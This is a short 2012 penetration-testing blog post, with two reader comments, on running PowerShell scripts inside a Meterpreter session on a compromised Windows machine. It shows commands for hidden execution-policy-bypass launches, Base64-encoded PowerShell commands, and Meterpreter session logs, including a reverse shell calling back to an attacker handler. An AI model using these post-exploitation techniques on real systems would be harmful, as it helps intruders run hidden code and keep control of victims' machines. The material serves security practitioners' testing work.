Thursday, October 11, 2012

Run a PowerShell module in Meterpreter


I don't know why but powershell and meterpeter just dont play nice.

Part of it is the whole interactive shell-ness of powershell. so if you just type "powershell" once you drop to a cmd.exe you wont ever get the powershell prompt.

In a similar vain i've been unable to get any sort of combination of execute -f powershell.exe -a " blah blah" to work either.  If anyone has the magic syntax i know lots of people that would be interested. (actually carlos perez hooked me up...answer below)

so, you can run powershell scripts via  bat files and those execute just fine from within cmd.exe or from the "execute" command OR the encoded command [command].


C:\>type run_ps.bat
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -WindowStyle Hidden -File C:\do_neat_ps_stuff.ps1

Example:

meterpreter > execute -H -f cmd.exe -a '/c C:\runps.bat'
Process 28536 created.
meterpreter > 
[*] 4.5.6.21:3863 Request received for /vLNL...
[*] 4.5.6.21:3863 Staging connection for target /vLNL received...
--snip--
[*] Patched Communication Timeout at offset 653608...
[*] Meterpreter session 9 opened (1.2.3.205:443 -> 4.5.6.21:3863) at 2012-09-09 16:29:30 -0400

carlos perez mentioned at Derbycon you can also do:

on linux download this script https://github.com/darkoperator/powershell_scripts/blob/master/ps_encoder.py or if on windows you can download the EXE https://github.com/darkoperator/powershell_scripts/blob/master/ps_encoder.exe

you can use it to encode a script and then run it like so:

msf  exploit(handler) > 
[*] Sending stage (752128 bytes) to 192.168.1.225
[*] Meterpreter session 1 opened (192.168.1.100:4444 -> 192.168.1.225:49163) at 2012-09-17 15:58:33 -0400

msf  exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > shell 
Process 3416 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\carlos\Desktop>powershell.exe -encodedcommand dwByAGkAdABlAC0AaABvAHMAdAAgAGgAZQBsAGwAbwAgAHcAbwByAGwAZAA=
powershell.exe -encodedcommand dwByAGkAdABlAC0AaABvAHMAdAAgAGgAZQBsAGwAbwAgAHcAbwByAGwAZAA=
hello world

C:\Users\carlos\Desktop>
CG

2 comments:

Russel Van Tuyl said...

Would something like this work:

C:\WINDOWS\system32\cmd.exe /c powershell -command `"& {Set-ExecutionPolicy Unrestricted -Force}`" && powershell -File `"C:\sript1.ps1`"

mihi said...

Set-ExecutionPolicy requires admin privileges; on the other hand

powershell -NoProfile -ExecutionPolicy Unrestricted .\script.ps1

works fine even without admin privileges.

Note that the default PowerShell host (ConsoleHost) depends a lot on having a native console available - even executing a console application or trying to read input is done via the native console instead of using standard input/output streams.

An alternative might be to implement an alternative Host class, like my StreamHost.

I tried to implement that as a PowerShell script, but failed due to the fact I could not read from the standard
input stream without hanging the ConsoleHost that is used to execute the script.

Maybe someone else is more successful there.